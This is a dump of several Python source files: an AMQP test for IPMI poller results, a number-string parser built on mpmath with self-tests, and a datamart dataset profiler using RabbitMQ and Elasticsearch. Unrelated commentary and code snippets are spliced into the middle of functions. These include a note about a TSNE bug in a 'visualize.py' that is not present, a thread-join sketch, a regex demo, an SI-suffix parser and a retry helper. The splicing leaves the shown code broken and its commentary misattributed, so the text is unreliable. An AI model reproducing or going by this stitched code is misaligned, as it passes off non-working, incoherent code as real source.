amqp_tasker_loop(self):\n completion = 0\n while completion < len(self.__threadTasks):\n for t in self.__threadTasks:\n if t.state is False:\n LOG.info('shutting down worker thread for id {0}'.format(t.id))\n t.thread.join()\n completion += 1\n\n @test(groups=['amqp.tests.sel'],depends_on_groups=['check-obm'])\n def check_sel_task(self):\n \"\"\" Testing AMQP on.task.ipmi.sel.result \"\"\"\n Nodes().api1_1_nodes_get()\n nodes = loads(self.__client.last_response.data)\n self.__threadTasks = []\n for node in nodes:\n id = node.get('id')\n assert_not_equal(id,None)\n type = node.get('type')\n assert_not_equal(type,None)\n if type == 'compute':\n worker = Worker(queue=QUEUE_SEL_RESULT, callbacks=[self.handle_result])\n thread = Thread(target=self.amqp_tasker_thread,args=(worker,id,))\n thread.daemon = True\n self.__threadTasks.append(self.ThreadTask(worker,thread,id))\n for t in self.__threadTasks:\n t.thread.start()\n t.state = True\n 
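One bug worth flagging in visualize.py above: the scatter and nearest-neighbor sections index feats_embedded, but the TSNE(...) line that would compute it is commented out, so the script raises a NameError as written. A minimal sketch of the missing step, with random features standing in for the (N, 256) fc1 activations collected above:

import numpy as np
from sklearn.manifold import TSNE

# Sketch: compute the 2-D embedding the plotting code above expects.
features = np.random.rand(100, 256).astype(np.float32)
feats_embedded = TSNE(n_components=2, init='random', perplexity=30).fit_transform(features)
print(feats_embedded.shape)  # (100, 2)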
self.amqp_tasker_loop()\n\n @test(groups=['amqp.tests.sdr'],depends_on_groups=['check-obm', 'amqp.tests.sel'])\n def check_sdr_task(self):\n \"\"\" Testing AMQP on.task.ipmi.sdr.result \"\"\"\n Nodes().api1_1_nodes_get()\n nodes = loads(self.__client.last_response.data)\n self.__threadTasks = []\n for node in nodes:\n id = node.get('id')\n assert_not_equal(id,None)\n type = node.get('type')\n assert_not_equal(type,None)\n if type == 'compute':\n worker = Worker(queue=QUEUE_SDR_RESULT, callbacks=[self.handle_result])\n thread = Thread(target=self.amqp_tasker_thread,args=(worker,id,))\n thread.daemon = True\n self.__threadTasks.append(self.ThreadTask(worker,thread,id))\n for t in self.__threadTasks:\n t.thread.start()\n t.state = True\n self.amqp_tasker_loop()\n\n @test(groups=['amqp.tests.chassis'],depends_on_groups=['check-obm', 'amqp.tests.sdr'])\n def check_chassis_task(self):\n \"\"\" Testing AMQP on.task.ipmi.chassis.result \"\"\"\n Nodes().api1_1_nodes_get()\n nodes = loads(self.__client.last_response.data)\n self.__threadTasks = []\n for node in nodes:\n id = node.get('id')\n assert_not_equal(id,None)\n type = node.get('type')\n assert_not_equal(type,None)\n if type == 'compute':\n worker = Worker(queue=QUEUE_CHASSIS_RESULT, callbacks=[self.handle_result])\n thread = Thread(target=self.amqp_tasker_thread,args=(worker,id,))\n thread.daemon = True\n self.__threadTasks.append(self.ThreadTask(worker,thread,id))\n for t in self.__threadTasks:\n t.thread.start()\n t.state = True\n self.amqp_tasker_loop()\n\n def handle_result(self,body,message):\n LOG.debug(body,json=True)\n assert_is_not_none(body)\n assert_is_not_none(message)\n id = body['value'].get('node')\n assert_not_equal(id,None)\n for t in self.__threadTasks:\n if t.id == id:\n workId = body['value'].get('workItemId')\n assert_not_equal(workId,None)\n Pollers().api1_1_pollers_identifier_get(workId)\n poller = loads(self.__client.last_response.data)\n config = poller.get('config')\n assert_not_equal(config,None)\n command = config.get('command')\n assert_not_equal(command,None)\n LOG.info('Received message (nodeId={0}, workId={1}, command={2})'.format(id,workId,command))\n message.ack()\n LOG.info('stopping AMQP worker for id {0}'.format(id))\n t.worker.stop()\n t.state = False\n\n","sub_path":"test/tests/amqp_tests.py","file_name":"amqp_tests.py","file_ext":"py","file_size_in_byte":5169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"523901738","text":"'''\n$Id: number.py 1.24 2009/02/10 23:19:16 donp Exp $\n\nCopyright (c) 2009, Don Peterson\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions are\nmet:\n\n* Redistributions of source code must retain the above copyright\n notice, this list of conditions and the following disclaimer.\n* Redistributions in binary form must reproduce the above\n copyright notice, this list of conditions and the following\n disclaimer in the documentation and/or other materials provided\n with the distribution.\n* Neither the name of the nor the names of its\n contributors may be used to endorse or promote products derived\n from this software without specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n\"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\nLIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\nA PARTICULAR PURPOSE ARE DISCLAIMED. 
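The amqp_tasker_loop used by the three tests above polls a per-thread state flag and can join the same thread on several passes. Because Thread.join already blocks until the thread exits, joining each worker once is sufficient; a standalone sketch of that pattern, where a sleep stands in for a Worker consuming messages:

import threading
import time

# Sketch: join each worker exactly once instead of polling a state flag.
def worker(n):
    time.sleep(0.05 * n)  # stand-in for Worker.start() processing messages

threads = [threading.Thread(target=worker, args=(i,), daemon=True) for i in range(3)]
for t in threads:
    t.start()
for t in threads:
    t.join()  # blocks until that worker finishes; no busy-wait needed
print('all workers finished')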
IN NO EVENT SHALL THE COPYRIGHT\nOWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\nSPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\nLIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\nDATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\nTHEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n'''\n\nimport re\nfrom mpmath import mpf, mpc, mpi, inf\nfrom rational import Rational\nfrom integer import Zn, isint\nfrom julian import Julian\nfrom string import strip\nfrom si import suffixes_ln\n\ntry: from pdb import xx\nexcept: pass\n\n# Number recognition regular expressions\ninteger = re.compile(\"^[+-]?\\d+$\")\n\ncre=r'''\n %s # Match at beginning\n ([+-])%s # Optional leading sign\n %s # Placeholder for imaginary unit\n (\\d+\\.\\d+|\\d+\\.?|\\.\\d+) # Required digits and opt. decimal point\n (e[+-]?\\d+)? # Optional exponent\n %s # Match at end\n'''\n# Pure imaginary, xi or ix\nI1 = cre % (\"^\", \"?\", \"\", \"i$\")\nI2 = cre % (\"^\", \"?\", \"i\", \"$\")\n\n# Reals\nR = cre % (\"^\", \"?\", \"\", \"$\")\n\n# True complex numbers: x+iy or x+yi\nC1 = (cre % (\"^\", \"?\", \"\", \"\")) + (cre % (\"\", \"\", \"\", \"[ij]$\"))\nC2 = (cre % (\"^\", \"?\", \"\", \"\")) + (cre % (\"\", \"\", \"[ij]\", \"$\"))\n\n# Degenerate complex numbers: 1-i, 3.7+i\nnum = r\"([+-]?)(\\d+\\.\\d+|\\d+\\.?|\\.\\d+)(e[+-]?\\d+)?\"\nC3 = r\"^%s([+-][ij])$\" % num\n\n# True complex numbers: (x,y)\nC4 = r\"^\\(%s(,)%s\\)$\" % (num, num)\ndel num\n\n# Regular expressions\nimag1 = re.compile(I1, re.X | re.I)\nimag2 = re.compile(I2, re.X | re.I)\nreal = re.compile(R, re.X | re.I)\ncomplex1 = re.compile(C1, re.X | re.I)\ncomplex2 = re.compile(C2, re.X | re.I)\ncomplex3 = re.compile(C3, re.X | re.I)\ncomplex4 = re.compile(C4, re.X | re.I)\n\n# Rationals: \"a/b\", and \"axb/c\" forms are allowed where a and b are\n# integers and x is one or more of the following characters: '+- '. \n# b and c are always positive; a may be positive or negative.\nRa = r'''\n ^ # Mixed fraction\n ([-+])? 
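The number patterns above lean on re.X (verbose mode), which is what allows the cre template to carry comments and whitespace without matching them. A small self-contained demonstration of the same technique:

import re

# Sketch: a verbose-mode pattern in the style of the `cre` template above,
# matching a signed decimal with an optional exponent.
NUMBER = re.compile(r'''
    ^([+-])?                   # optional leading sign
    (\d+\.\d+|\d+\.?|\.\d+)    # digits with optional decimal point
    (e[+-]?\d+)?$              # optional exponent
''', re.X | re.I)

for text in ('3.14', '-2E10', '.5', 'abc'):
    print(text, '->', bool(NUMBER.match(text)))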
# Optional sign\n (\\d+) # Integer \n [-+ ]+ # Separation character\n (\\d+) # Numerator\n / # Fraction separator\n (\\d+) # Denominator\n $\n | # Or\n ^ # Canonical fraction\n ([-+]?\\d+) # Integer a with optional sign\n / # Fraction separator\n (\\d+) # Denominator\n $\n'''\nrational = re.compile(Ra, re.X | re.I)\n\nclass Number(object):\n '''Used to generate a number object from a string.\n '''\n\n # If the following class variable is nonzero, then integers are\n # being restricted to a said number of bits.\n bits = 0\n\n # If signed is True, then integer arithmetic is signed; otherwise,\n # arithmetic is unsigned.\n signed = True\n\n def __init__(self):\n pass\n\n def __call__(self, s):\n assert len(s) > 0\n suffix = 1\n if s != \"now\" and s != \"today\":\n if len(s) > 1 and s[:2] != \"0x\":\n if s[-1] in suffixes_ln:\n exponent = suffixes_ln[s[-1]]\n if exponent >= 0:\n suffix = Zn(10**exponent)\n else:\n suffix = mpf(\"1e\" + str(exponent))\n s = s[:-1]\n for func in (self.j, self.i, self.q, self.v, self.r, self.c):\n x = func(s)\n if x != None: \n if suffix == 1:\n return x\n if isint(x):\n if isint(suffix): return Zn(suffix*x)\n else: return suffix*mpf(int(x))\n elif isinstance(x, Rational):\n if isint(suffix): return Rational(suffix*x.n, x.d)\n else: return suffix*x.mpf()\n elif isinstance(x, mpf) or \\\n isinstance(x, mpc) or \\\n isinstance(x, mpi):\n if isint(suffix): return mpf(int(suffix))*x\n else: return suffix*x\n else:\n return None\n return None\n\n def j(self, s):\n '''Check to see if it's a Julian date/time form. We only allow\n two forms: 'dS[y[:...]]' where S is a string for the month or\n '.+:.+' (regexp syntax) where it contains a colon and means a \n time today. 'now' and 'today' are also allowed.\n '''\n if s == \"now\" or s == \"today\" or \":\" in s:\n return Julian(s)\n sl = s.lower()\n for month in Julian.month_names:\n if month.lower() in sl:\n return Julian(s)\n return None\n\n def i(self, s):\n # Handle special cases like 0x, 0o, and 0b\n try:\n value = 0\n match = False\n if len(s) > 2:\n if s[:2] == \"0x\":\n value = int(s[2:], 16)\n match = True\n elif s[:2] == \"0o\":\n value = int(s[2:], 8)\n match = True\n elif s[:2] == \"0b\":\n value = int(s[2:], 2)\n match = True\n if integer.match(s):\n return Zn(int(s))\n if match:\n return Zn(value)\n except ValueError:\n pass\n except Exception:\n raise\n return None\n\n def q(self, s):\n mo = rational.match(s)\n if mo:\n g = [i for i in mo.groups() if i]\n sign = \"\"\n if g[0] == \"+\":\n del g[0]\n elif g[0] == \"-\":\n sign = \"-\"\n del g[0]\n try:\n num = [int(i) for i in g]\n except:\n raise Exception(\"Bug: rational match on non-integer\")\n if not num:\n return None\n elif len(num) == 2:\n w, n, d = 0, num[0], num[1]\n elif len(num) == 3:\n w, n, d = num\n else:\n msg = \"Program bug\\nUnexpected number of matches on\\n\"\n msg += \"'%s'\" % s\n raise Exception(msg)\n n = int(sign + str(w*d + n))\n return Rational(n, d)\n else:\n return None\n\n def r(self, s):\n # Handle infinities\n if s == \"inf\": return inf\n if s == \"-inf\": return -inf\n # If the number begins with \"E\" or 'e', prepend a 1\n if s[0] == \"E\" or s[0] == \"e\":\n s = \"1\" + s\n mo = real.match(s)\n if mo:\n num = [i for i in mo.groups() if i]\n if not num:\n return None\n else:\n try:\n return mpf(''.join(num))\n except:\n return None\n else:\n return None\n\n def c(self, s):\n s = s.lower()\n s = s.replace(\"j\", \"i\")\n if \"i\" not in s and \"(\" not in s:\n return None\n if s == \"i\" or s == \"+i\":\n return mpc(0, 1)\n 
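In Number.__call__ above, a trailing SI letter is converted to a power of ten through suffixes_ln before the rest of the string is parsed. The si module is not shown here, so the table below is an assumed stand-in for illustration only:

# Sketch: trailing-SI-suffix scaling as done in Number.__call__ above.
# This suffix table is an assumption; the real mapping lives in the si
# module's suffixes_ln, which is not part of this file.
SUFFIXES = {'k': 3, 'M': 6, 'G': 9, 'm': -3, 'u': -6}

def parse_with_suffix(s):
    if s and s[-1] in SUFFIXES:
        return float(s[:-1]) * 10 ** SUFFIXES[s[-1]]
    return float(s)

print(parse_with_suffix('4.7k'))  # 4700.0
print(parse_with_suffix('250m'))  # 0.25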
if s == \"-i\":\n return mpc(0, -1)\n mo = complex3.match(s)\n if mo:\n n = ''.join([i for i in mo.groups() if i])\n try:\n ending = n[-2:]\n if ending == \"+i\":\n return mpc(mpf(n[:-2]), 1)\n elif ending == \"-i\":\n return mpc(mpf(n[:-2]), -1)\n else:\n raise Exception(\"Program bug: unexpected complex number\")\n except:\n pass\n for expression in (imag1, imag2):\n mo = expression.match(s)\n if mo:\n num = [i for i in mo.groups() if i]\n if num:\n try:\n return mpc(0, mpf(''.join(num)))\n except:\n return None\n else:\n return None\n for expression in (complex1, complex2):\n mo = expression.match(s)\n if mo:\n try:\n g = mo.groups()\n r = mpf(''.join([i for i in g[:3] if i]))\n i = mpf(''.join([i for i in g[3:] if i]))\n return mpc(r, i)\n except:\n return None\n mo = complex4.match(s)\n if mo:\n try:\n s = \"\".join([i for i in mo.groups() if i])\n r, i = [mpf(i) for i in s.split(\",\")]\n return mpc(r, i)\n except:\n return None\n\n def v(self, s):\n '''Interval numbers: allowed forms are\n 1. 'a +- b'\n 2. 'a (b%)' % sign is optional\n 3. '[a, b]'\n In 1, a is the midpoint of the interval and b is the half-width.\n In 2, a is the midpoint of the interval and b is the half-width.\n In 3, the interval is indicated directly.\n '''\n e = ValueError(\"Improperly formed interval number '%s'\" %s)\n s = s.replace(\" \", \"\")\n if \"+-\" in s:\n n = [mpf(strip(i)) for i in s.split(\"+-\")]\n return mpi(n[0] - n[1], n[0] + n[1])\n elif \"(\" in s:\n if s[0] == \"(\": # Don't confuse with a complex number (x,y)\n return None\n if \")\" not in s:\n raise e\n s = s.replace(\")\", \"\")\n percent = False\n if \"%\" in s:\n if s[-1] != \"%\":\n raise e\n percent = True\n s = s.replace(\"%\", \"\")\n a, p = [mpf(strip(i)) for i in s.split(\"(\")]\n d = p\n if percent:\n d = a*p/mpf(100)\n return mpi(a - d, a + d)\n elif \",\" in s:\n if \"[\" not in s: raise e\n if \"]\" not in s: raise e\n s = s.replace(\"[\", \"\")\n s = s.replace(\"]\", \"\")\n n = [mpf(strip(i)) for i in s.split(\",\")]\n return mpi(n[0], n[1])\n else:\n return None\n\nif __name__ == \"__main__\":\n # Test cases\n nums = {\n # Integers\n Zn(0) : (\n \"0\", \"+0\", \"-0\", \"000\", \"+000\", \"-000\", \n ),\n Zn(1) : (\n \"1\", \"+1\", \"01\", \"+01\", \"001\", \"+001\", \n ),\n Zn(-1) : (\n \"-1\", \"-01\", \"-001\",\n ),\n Zn(124) : (\n \"124\", \"+124\", \"0124\", \"+0124\", \"000124\", \"+000124\",\n ),\n Zn(-123) : (\n \"-123\", \"-000123\",\n ),\n\n # Reals\n mpf(0) : (\n \"0.0\", \"+0.0\", \"-0.0\",\n \"000.000\", \"+000.000\", \"-000.000\",\n ),\n mpf(1) : (\n \"1.\", \"+1.\", \"1.0\", \"+1.0\", \n \"1.0e0\", \"+1.0e0\",\n \"1.0E0\", \"+1.0E0\",\n ),\n mpf(-2) : (\n \"-2.\", \"-2.0\", \"-2.0e0\", \"-2.0000E000\",\n ),\n mpf(\"-2.3\") : (\n \"-2.3\", \"-2.30\", \"-2.3000\", \"-2.3e0\", \"-2300e-3\", \"-0.0023e3\",\n \"-.23E1\",\n ),\n mpf(\"2.345e-7\") : (\n \"2.345e-7\", \"2345e-10\", \"0.00000002345E+1\", \"0.0000002345\",\n ),\n\n # Pure imaginaries\n mpc(0, 1) : (\n \"i\", \"+i\", \"1i\", \"+1i\", \"+i1\",\n \"1.i\", \"+1.i\", \"+i1.\",\n \"1.0i\", \"+1.0i\", \"+i1.0\",\n \"1.00i\", \"+1.00i\", \"+i1.00\",\n ),\n mpc(0, -1) : (\n \"-i\", \"-i\", \"-1i\", \"-i1\",\n \"-1.i\", \"-1.i\", \"-i1.\",\n \"-1.0i\", \"-1.0i\", \"-i1.0\",\n \"-1.00i\", \"-1.00i\", \"-i1.00\",\n ),\n mpc(0, 3) : (\n \"3i\", \"+3i\", \"3.i\", \"+3.i\", \"3.0i\", \"+3.0i\", \"3.0e0i\", \"+3.0e0i\",\n \"I3\", \"+I3\", \"I3.\", \"+I3.\", \"I3.0\", \"+I3.0\", \"I3.0e0\", \"+I3.0e0\",\n \"3.000i\", \"i3.000\", \"3.000E0i\", \"i3.000E0\",\n 
\"3.000e-0J\", \"J3.000e-0\", \"3.000e+0J\", \"J3.000e+0\",\n ),\n mpc(0, -8) : (\n \"-8i\", \"-8.i\", \"-8.0i\", \"-8.0e0i\",\n \"-j8\", \"-j8.\", \"-j8.0\", \"-j8.0E0\",\n ),\n mpc(0, mpf(\"-0.123\")) : (\n \"-.123i\", \"-.123j\", \"-0.123i\", \"-1.23e-1i\",\n ),\n\n # Complex numbers\n mpc(1, -1) : (\n \"1-1i\", \"1-1.i\", \"1.-1i\", \"1.-1.i\",\n \"1-j1\", \"1-j1.\", \"1.-j1\", \"1.-j1.\",\n \"1.00-1.00I\", \"1.00-I1.00\", \"1000e-3-100000e-5I\",\n \"1.00-J1.00\", \"1000E-3-J100000E-5\",\n ),\n mpc(1, 1) : (\n \"1+1i\", \"1+1.i\", \"1.+1i\", \"1.+1.i\",\n \"1+i\", \"1.0+i\", \"1.000+i\", \n ),\n mpc(\"4.9\", -1) : (\n \"4.9-1i\", \"4.9-1.i\", \"49e-1-1i\",\n \"4.9-i\", \"49e-1-i\",\n ),\n mpc(\"-7\", -1) : (\n \"-7-1i\", \"-7-1.i\", \"-70e-1-1i\",\n \"-7-i\", \"-70e-1-i\",\n ),\n mpc(mpf(\"11.549e-59\"), mpf(\"-8.31e89\")) : (\n \"11.549e-59-8.31e89I\", \"1.1549e-58-J831e87\",\n ),\n mpc(1, 2): (\n \"(1,2)\", \"(1.,2.)\", \"(1.0,2.0)\", \"(1.000,2.000)\",\n ),\n\n # Rational numbers\n Rational(3, 8) : (\n \"3/8\", \"6/16\", \"0 12/32\", \"0-15/40\", \"0+18/48\",\n ),\n Rational(-3, 7) : (\n \"-3/7\", \"-6/14\", \"-0 12/28\", \"-0-15/35\", \"-0+18/42\",\n ),\n Rational(3, -7) : (\n \"-3/7\", \"-6/14\", \"-0 12/28\", \"-0-15/35\", \"-0+18/42\",\n ),\n }\n # Because of a bug in mpi == and != tests, we have to test them\n # differently.\n mpi_tests = {\n # Interval numbers\n mpi(1, 3) : (\n \"[1, 3]\", \"[1.0, 3]\", \"[1, 3.0]\", \"[1.0, 3.0]\",\n \"[1,3]\", \"[1.0,3]\", \"[1,3.0]\", \"[1.0,3.0]\",\n \"[ 1, 3]\", \"[ 1.0,3]\", \"[ 1, 3.0]\",\n \"1.5 +- 0.5\", \"1.5+-0.5\", \"1.5+- 0.5\", \"1.5 +-0.5\", \n \"1.5 +- 0.5\", \"15e-1 +- 500e-3\", \n \"1.5(33.33333333333333333333%)\", \"1.5 (33.33333333333333333333%)\",\n \"1.5 ( 33.33333333333333333333%)\",\n \"1.5 ( 33.33333333333333333333 % )\",\n \"1.5( 33.33333333333333333333 % )\",\n \"1.5(33.33333333333333333333 % )\",\n ),\n }\n\n n = Number()\n status = 0\n for number in nums:\n for numstr in nums[number]:\n num = n(numstr)\n if num != number:\n print(\"Error for '%s'\" % numstr)\n print(\" Should be %s\" % str(number))\n print(\" Got %s\" % str(num))\n status += 1\n for number in mpi_tests:\n for numstr in mpi_tests[number]:\n num = n(numstr)\n if (num.a != number.a) and (num.b != number.b):\n print(\"Error for '%s'\" % numstr)\n print(\" Should be %s\" % str(number))\n print(\" Got %s\" % str(num))\n status += 1\n exit(status)\n","sub_path":"number.py","file_name":"number.py","file_ext":"py","file_size_in_byte":16005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"504263888","text":"import aio_pika\nimport asyncio\nimport contextlib\nimport csv\nfrom datetime import datetime\nimport elasticsearch\nimport itertools\nimport lazo_index_service\nimport logging\nimport os\nimport prometheus_client\nimport threading\nimport time\nimport xlrd\n\nfrom datamart_core.common import setup_logging, add_dataset_to_index, \\\n delete_dataset_from_index, log_future, json2msg, msg2json\nfrom datamart_core.materialize import get_dataset\nfrom datamart_materialize import DatasetTooBig\nfrom datamart_materialize.excel import xls_to_csv\nfrom datamart_materialize.pivot import pivot_table\nfrom datamart_materialize.tsv import tsv_to_csv\nfrom datamart_profiler import process_dataset, parse_date\n\n\nlogger = logging.getLogger(__name__)\n\n\nMAX_CONCURRENT_PROFILE = 1\nMAX_CONCURRENT_DOWNLOAD = 2\n\n\nPROM_DOWNLOADING = prometheus_client.Gauge(\n 'profile_downloading_count', \"Number of datasets 
currently downloading\",\n)\nPROM_PROFILING = prometheus_client.Gauge(\n 'profile_profiling_count', \"Number of datasets currently profiling\",\n)\n\n\n@contextlib.contextmanager\ndef prom_incremented(metric, amount=1):\n \"\"\"Context manager that increments a metric, then decrements it at the end.\n \"\"\"\n metric.inc(amount)\n try:\n yield\n finally:\n metric.dec(amount)\n\n\ndef materialize_and_process_dataset(\n dataset_id, metadata,\n lazo_client, nominatim,\n profile_semaphore,\n cache_invalid=False,\n):\n with contextlib.ExitStack() as stack:\n with prom_incremented(PROM_DOWNLOADING):\n dataset_path = stack.enter_context(\n get_dataset(metadata, dataset_id, cache_invalid=cache_invalid)\n )\n materialize = metadata.pop('materialize')\n\n # Check for Excel file format\n try:\n xlrd.open_workbook(dataset_path)\n except xlrd.XLRDError:\n pass\n else:\n logger.info(\"This is an Excel file\")\n materialize.setdefault('convert', []).append({'identifier': 'xls'})\n excel_temp_path = dataset_path + '.xls'\n os.rename(dataset_path, excel_temp_path)\n try:\n with open(dataset_path, 'w', newline='') as dst:\n xls_to_csv(excel_temp_path, dst)\n finally:\n os.remove(excel_temp_path)\n\n # Check for TSV file format\n with open(dataset_path, 'r') as fp:\n try:\n dialect = csv.Sniffer().sniff(fp.read(16384))\n except Exception as error: # csv.Error, UnicodeDecodeError\n logger.error(\"csv.Sniffer error: %s\", error)\n dialect = csv.get_dialect('excel')\n if getattr(dialect, 'delimiter', '') == '\\t':\n logger.info(\"This is a TSV file\")\n materialize.setdefault('convert', []).append({'identifier': 'tsv'})\n tsv_temp_path = dataset_path + '.tsv'\n os.rename(dataset_path, tsv_temp_path)\n try:\n with open(dataset_path, 'w', newline='') as dst:\n tsv_to_csv(tsv_temp_path, dst)\n finally:\n os.remove(tsv_temp_path)\n\n # Check for pivoted temporal table\n with open(dataset_path, 'r') as fp:\n reader = csv.reader(fp)\n try:\n columns = next(iter(reader))\n except StopIteration:\n columns = []\n if len(columns) >= 3:\n non_matches = [\n i for i, name in enumerate(columns)\n if parse_date(name) is None\n ]\n if len(non_matches) <= max(2.0, 0.20 * len(columns)):\n logger.info(\"Detected pivoted table\")\n materialize.setdefault('convert', []).append({\n 'identifier': 'pivot',\n 'except_columns': non_matches,\n })\n pivot_temp_path = dataset_path + '.pivot.csv'\n os.rename(dataset_path, pivot_temp_path)\n try:\n with open(dataset_path, 'w', newline='') as dst:\n pivot_table(pivot_temp_path, dst, non_matches)\n finally:\n os.remove(pivot_temp_path)\n\n # Profile\n with profile_semaphore:\n with prom_incremented(PROM_PROFILING):\n logger.info(\"Profiling dataset %r\", dataset_id)\n start = time.perf_counter()\n metadata = process_dataset(\n data=dataset_path,\n dataset_id=dataset_id,\n metadata=metadata,\n lazo_client=lazo_client,\n nominatim=nominatim,\n include_sample=True,\n coverage=True,\n plots=True,\n )\n logger.info(\n \"Profiling dataset %r took %.2fs\",\n dataset_id,\n time.perf_counter() - start,\n )\n\n metadata['materialize'] = materialize\n return metadata\n\n\nclass Profiler(object):\n def __init__(self):\n self.profile_semaphore = threading.Semaphore(MAX_CONCURRENT_PROFILE)\n self.es = elasticsearch.Elasticsearch(\n os.environ['ELASTICSEARCH_HOSTS'].split(',')\n )\n self.lazo_client = lazo_index_service.LazoIndexClient(\n host=os.environ['LAZO_SERVER_HOST'],\n port=int(os.environ['LAZO_SERVER_PORT'])\n )\n self.nominatim = os.environ['NOMINATIM_URL']\n self.channel = None\n\n self.loop = 
asyncio.get_event_loop()\n log_future(self.loop.create_task(self._run()), logger,\n should_never_exit=True)\n\n # Retry a few times, in case the Elasticsearch container is not yet up\n for i in itertools.count():\n try:\n if not self.es.indices.exists('datamart'):\n raise RuntimeError(\"'datamart' index does not exist\")\n except Exception:\n logger.warning(\"Can't connect to Elasticsearch, retrying...\")\n if i == 5:\n raise\n else:\n time.sleep(5)\n else:\n break\n\n async def _amqp_setup(self):\n # Setup the datasets exchange\n self.datasets_exchange = await self.channel.declare_exchange(\n 'datasets',\n aio_pika.ExchangeType.TOPIC)\n\n # Setup the profiling exchange\n self.profile_exchange = await self.channel.declare_exchange(\n 'profile',\n aio_pika.ExchangeType.FANOUT,\n )\n\n # Declare the profiling queue\n self.profile_queue = await self.channel.declare_queue(\n 'profile',\n arguments={'x-max-priority': 3},\n )\n await self.profile_queue.bind(self.profile_exchange)\n\n # Declare the failed queue\n self.failed_queue = await self.channel.declare_queue('failed_profile')\n\n async def _run(self):\n connection = await aio_pika.connect_robust(\n host=os.environ['AMQP_HOST'],\n port=int(os.environ['AMQP_PORT']),\n login=os.environ['AMQP_USER'],\n password=os.environ['AMQP_PASSWORD'],\n )\n self.channel = await connection.channel()\n await self.channel.set_qos(prefetch_count=MAX_CONCURRENT_DOWNLOAD)\n\n await self._amqp_setup()\n\n # Consume profiling queue\n async for message in self.profile_queue:\n obj = msg2json(message)\n dataset_id = obj['id']\n metadata = obj['metadata']\n materialize = metadata.get('materialize', {})\n\n logger.info(\"Processing dataset %r from %r\",\n dataset_id, materialize.get('identifier'))\n\n # Compare materialization info with stored to know whether cache\n # should be ignored\n try:\n hit = self.es.get('datamart', dataset_id)\n except elasticsearch.NotFoundError:\n cache_invalid = True\n else:\n cache_invalid = materialize != hit['_source']['materialize']\n\n future = self.loop.run_in_executor(\n None,\n materialize_and_process_dataset,\n dataset_id,\n metadata,\n self.lazo_client,\n self.nominatim,\n self.profile_semaphore,\n cache_invalid,\n )\n\n future.add_done_callback(\n self.process_dataset_callback(\n message, dataset_id,\n )\n )\n\n def process_dataset_callback(self, message, dataset_id):\n async def coro(future):\n metadata = msg2json(message)['metadata']\n try:\n try:\n metadata = future.result()\n if metadata['nb_rows'] == 0:\n logger.info(\n \"Dataset has no rows, not inserting into index: \" +\n \"%r\",\n dataset_id,\n )\n delete_dataset_from_index(\n self.es,\n dataset_id,\n # DO delete from Lazo\n self.lazo_client,\n )\n self.es.index(\n 'pending',\n dict(\n status='error',\n error=\"Dataset has no rows\",\n metadata=metadata,\n date=datetime.utcnow().isoformat(),\n source=metadata['source'],\n materialize=metadata['materialize'],\n ),\n id=dataset_id,\n )\n else:\n # Delete dataset if already exists in index\n delete_dataset_from_index(\n self.es,\n dataset_id,\n # Don't delete from Lazo, we inserted during profile\n None,\n )\n # Insert results in Elasticsearch\n body = dict(metadata,\n date=datetime.utcnow().isoformat() + 'Z',\n version=os.environ['DATAMART_VERSION'])\n add_dataset_to_index(self.es, dataset_id, body)\n\n # Publish to RabbitMQ\n await self.datasets_exchange.publish(\n json2msg(dict(body, id=dataset_id)),\n dataset_id,\n )\n\n # Remove from alternate index\n try:\n self.es.delete('pending', dataset_id)\n except 
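The startup loop above retries the Elasticsearch index check six times with a fixed five-second sleep. The same idea as a reusable helper with exponential backoff -- the names and defaults here are illustrative, not part of the original module:

import time

# Sketch: generic retry with exponential backoff, same spirit as the
# fixed time.sleep(5) loop above.
def retry(fn, attempts=6, base_delay=1.0, exc=Exception):
    for i in range(attempts):
        try:
            return fn()
        except exc:
            if i == attempts - 1:
                raise
            time.sleep(base_delay * 2 ** i)

calls = iter([RuntimeError('down'), RuntimeError('down'), 'ok'])

def flaky():
    result = next(calls)
    if isinstance(result, Exception):
        raise result
    return result

print(retry(flaky, base_delay=0.01))  # 'ok' after two failed attempts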
elasticsearch.NotFoundError:\n pass\n except DatasetTooBig:\n # Materializer reached size limit\n logger.info(\"Dataset over size limit: %r\", dataset_id)\n message.ack()\n self.es.index(\n 'pending',\n dict(\n status='error',\n error=\"Dataset is too big\",\n metadata=metadata,\n date=datetime.utcnow().isoformat(),\n source=metadata['source'],\n materialize=metadata['materialize'],\n ),\n id=dataset_id,\n )\n except Exception as e:\n if isinstance(e, elasticsearch.RequestError):\n # This is a problem with our computed metadata\n logger.exception(\n \"Error inserting dataset %r in Elasticsearch\",\n dataset_id,\n )\n elif isinstance(e, elasticsearch.TransportError):\n # This is probably an issue with Elasticsearch\n # We'll log, nack and retry\n raise\n else:\n logger.exception(\"Error processing dataset %r\",\n dataset_id)\n # Move message to failed queue\n await self.channel.default_exchange.publish(\n aio_pika.Message(message.body),\n self.failed_queue.name,\n )\n # Ack anyway, retrying would probably fail again\n message.ack()\n\n self.es.index(\n 'pending',\n dict(\n status='error',\n error=\"Error profiling dataset\",\n metadata=metadata,\n date=datetime.utcnow().isoformat(),\n source=metadata['source'],\n materialize=metadata['materialize'],\n ),\n id=dataset_id,\n )\n else:\n message.ack()\n logger.info(\"Dataset %r processed successfully\",\n dataset_id)\n except Exception:\n message.nack()\n raise\n\n def callback(future):\n log_future(self.loop.create_task(coro(future)), logger)\n\n return callback\n\n\ndef main():\n setup_logging()\n prometheus_client.start_http_server(8000)\n logger.info(\"Startup: profiler %s\", 